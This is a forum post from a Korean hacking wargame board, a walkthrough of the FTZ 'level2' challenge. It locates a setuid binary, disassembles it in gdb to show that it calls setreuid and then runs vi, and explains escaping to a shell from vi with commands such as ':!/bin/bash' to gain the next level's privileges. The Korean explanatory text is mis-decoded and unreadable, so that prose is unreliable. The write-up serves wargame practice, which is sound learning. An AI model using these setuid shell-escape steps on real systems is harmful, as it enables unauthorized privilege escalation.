http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=2433 [º¹»ç]
·¹º§2 ÀÇ Á¤¼®ÀûÀÎ Ç®ÀÌÀÔ´Ï´Ù.
Âü°íÇϼ¼¿ä
ÀÚ ¸ÕÀú ·¹º§3 setuid°¡ °É¸° ÆÄÀÏÀ» ã½À´Ï´Ù.
[level2@ftz level2]$ find / -perm -04000 -group level2 2> /dev/null
/usr/bin/editor
[level2@ftz level2]$ ls -al /usr/bin/editor
-rwsr-x--- 1 level3 level2 22380 3¿ù 29 2003 /usr/bin/editor
±×·± ´ÙÀ½ ÀÌ ÆÄÀÏÀÌ ¹«¾ó ÇÏ´Â ÆÄÀÏÀÎÁö ±×¼ÓÀÇ ¹®ÀÚ¿µéÀ» °É·¯º¸±¸¿ä.
[level2@ftz level2]$ strings /usr/bin/editor
/lib/ld-linux.so.2
libc.so.6
system
__deregister_frame_info
setreuid
_IO_stdin_used
__libc_start_main
__register_frame_info
__gmon_start__
GLIBC_2.0
PTRh
QVh@
/bin/vi
OSF
À½ ´ëÃæ ºÁµµ vi ¿¡µðÅÍ°¡ º¸À̴±º¿ä.´õ ÀÚ¼¼È÷ º¸ÁÒ.
[level2@ftz level2]$ gdb -q /usr/bin/editor
(gdb) disas main
Dump of assembler code for function main:
0x08048440 <main+0>: push %ebp
0x08048441 <main+1>: mov %esp,%ebp
0x08048443 <main+3>: sub $0x8,%esp
0x08048446 <main+6>: sub $0x8,%esp
0x08048449 <main+9>: push $0xbbb <== 3003
0x0804844e <main+14>: push $0xbbb <== 3003
0x08048453 <main+19>: call 0x8048328 <setreuid>
0x08048458 <main+24>: add $0x10,%esp
0x0804845b <main+27>: sub $0xc,%esp
0x0804845e <main+30>: push $0x80484d8 <== "/bin/vi"
0x08048463 <main+35>: call 0x80482f8 <system>
0x08048468 <main+40>: add $0x10,%esp
0x0804846b <main+43>: leave
0x0804846c <main+44>: ret
0x0804846d <main+45>: lea 0x0(%esi),%esi
End of assembler dump.
(gdb) b *0x08048463
Breakpoint 1 at 0x8048463
(gdb) r
Starting program: /usr/bin/editor
Breakpoint 1, 0x08048463 in main ()
(gdb) x/s 0x80484d8
0x80484d8 <_IO_stdin_used+4>: "/bin/vi"
(gdb) q
[level2@ftz level2]$ id
uid=3002(level2) gid=3002(level2) groups=3002(level2)
[level2@ftz level2]$ cat /etc/passwd|grep level3
level3:x:3003:3003:Level 3:/home/level3:/bin/bash
½ÊÀ°Áø¼ö 0xbbb = ½ÊÁø¼ö 3003 À̴ϱî
setreuid(3003,3003); °¡ µÇ°í
system("/bin/vi"); À롃 ¾Ë¼ö ÀÖÁö¿ä.
½±°Ô ¸»ÇØ /usr/bin/editor ´Â vi ¿¡µðÅ͸¦ ½ÇÇàÇÏ´Â ²®µ¥±â
ÇÁ·Î±×·¥ÀμÀÀä.ÀÌ ÇÁ·Î±×·¥ÀÌ ½ÇÇàµÇ´Â µ¿¾È¿¡´Â ·¹º§3
ÀÇ ±ÇÇÑÀ» °®°Ô µÇ´Â°Ì´Ï´Ù.
ÀÌ ÇÁ·Î±×·¥ÀÇ ¾àÁ¡Àº ¹Ù·Î vi°¡ ½ÇÇàµÇ´Â µµÁß¿¡
Ưº°ÇÑ ¸í·É¾î¸¦ ÅëÇØ ½©¸í·É¾î³ª ´Ù¸¥¸í·É¾î¸¦ ½ÇÇàÇÒ¼ö ÀÖ´Ù´Â °Ì´Ï´Ù.
´Ùµé ¾Æ½Ã´Ù½ÃÇÇ »ç½Ç vi ¿¡¼ esc + : ÀÔ·ÂÀ» ÅëÇØ ex ¸ðµå·Î °¡¼
! ´ÙÀ½¿¡ ¾î¶² ¸í·É¾îµç ½ÇÇàÇÒ¼ö ÀÖ¾î¼
!/bin/bash ³ª !/bin/ash ¶Ç´Â !/bin/my-pass µîµî ´Ù¾çÇÏ°Ô ½ÃµµÇÒ¼ö ÀÖ½À´Ï´Ù.
¾î¶²ºÐÀº ¿Ö ²À !¸¦ ºÙ¿©¾ß ÇÏ´À³Ä ³ª´Â ±×°Å ¾ÈºÙÀÌ°íµµ µÇ´õ¶ó ÇϽôºÐ
°è½Åµ¥ »ç½Ç ±×·¸½À´Ï´Ù.:sh ¸¸ Ãĵµ ½©·Î ºüÁ® ³ª°¡ ÁöÁö¿ä.±×·¸Áö¸¸
±×»ÓÀÔ´Ï´Ù.´ÜÁö ½©·Î Àá½Ã ³ª°¥¼ö ÀÖ´Ù´Â°Í»Ó !ºÙ¿´À»¶§¿Í °°Àº ´Ù¾çÇÑ
¸í·É¾î½ÇÇàÀº ºÒ°¡´ÉÇÕ´Ï´Ù.
¿¹ÄÁ´ë :bash ³ª :my-pass °°Àº°Ç ¾ÈµÇ´Â°ÅÁÒ.
±»ÀÌ ±¸º°ÇÏÀÚ¸é :sh Àº vi ¿¡¼ Àá½Ã ½©·Î ºüÁ®³ª°£´Ù´Â ´À³¦ÀÌ °ÇÏ°í
:!pwd :!ls µîµî :!¿Í ÇÔ²² ¿À´Â ¸í·É¾î´Â ±× ¸í·É¾î¸¦ ½ÇÇàÇÏ°í
±× ½ÇÇà°á°ú¸¦ ÆíÁý¿¡ ±×´ë·Î »ç¿ëÇÑ´Ù´Â Áï ºüÁ® ³ª°¡Áö ¾Ê°í ÀÖ´Ù´Â ´À³¦ÀÌ
´õ °ÇÏÁö¿ä.
±×·¡¼ ±»ÀÌ ¸»ÇÏÀÚ¸é ½©·Î ³ª°¡±â À§Çؼ :sh ÇÏÁö¾Ê°í
:!sh ¶Ç´Â :!/bin/bash Çϴ°ÍÀº ŸÀÌÇÎ ³¶ºñÀμÀÀÌÁÒ.
:! ¶ó´Â ±â´ÉÀ» ¸¸µçÀÌÀ¯°¡ ±»ÀÌ ±ÍÂú°Ô ½©·Î ³ª°¡Áö ¾Ê°íµµ ´Ù¾çÇÑ ¸í·É¾î¸¦ ½ÇÇàÇÏ°í
±×°á°ú¸¦ ¹Ù·Î ÆíÁý¿¡ ¾´´Ù´Â °Å´Ï±î ¸»ÀÔ´Ï´Ù.
¾î·µç ¿ì¸®´Â ÇØÄ¿·Î¼ viÀÇ ¿ø·¡ ÀǵµµÈ ±â´É°ú »ó°ü¾øÀÌ
viÀÇ Ãë¾àÇÑ ºÎºÐÀ» °ø°ÝÇϴ°Ŵϱî ÀÌ·¸µç Àú·¸µç °ü°è¾øÁö¸¸ ¤»¤» |
Hit : 3380 Date : 2007/07/14 12:24
|